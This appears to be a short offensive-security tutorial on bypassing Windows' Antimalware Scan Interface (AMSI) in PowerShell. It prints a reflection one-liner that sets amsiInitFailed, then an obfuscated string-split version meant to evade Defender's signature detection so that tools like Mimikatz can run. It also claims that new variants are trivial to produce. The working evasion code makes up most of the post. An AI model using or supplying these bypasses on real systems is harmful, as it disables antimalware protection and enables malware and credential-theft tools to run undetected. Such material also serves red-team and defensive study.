Amsi Bypass

What is AMSI?

Antimalware Scan Interface probably makes your work harder by introducing additional security layer that scans scripts for malware signatures. For example, if we just wanted to run Mimikatz, we’d get annoying message like this:

Amsi working as expected

The magic oneliner that originally worked looks like this:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

but if you paste it to powershell, it will get flagged by AMSI before execution:

Amsi blocking amsi bypass

so let’s come up with a simple AMSI bypass by obfuscating the oneliner, first, let’s do this:

$assembly = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$field = $assembly.GetField('amsiInitFailed','NonPublic,Static')
$field.SetValue($null,$true)

if we try executing this line by line, we see that first two lines get caught by amsi:

Amsi catching us again

so, let’s just reshuffle things around:

$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)

Let’s test: Amsi bypassed

And that’s all. That’s how easy is it to bypass Antimalware scan interface in powershell.

N.B: Defender actually evaluates suspicious commands like our little script above so you will have to periodically come up with new ways to do the same thing as above, but this is usually as trivial as shown above.

Further references:

Black Hat talk by Tal Liberman
an MDSec blog by Adam Chester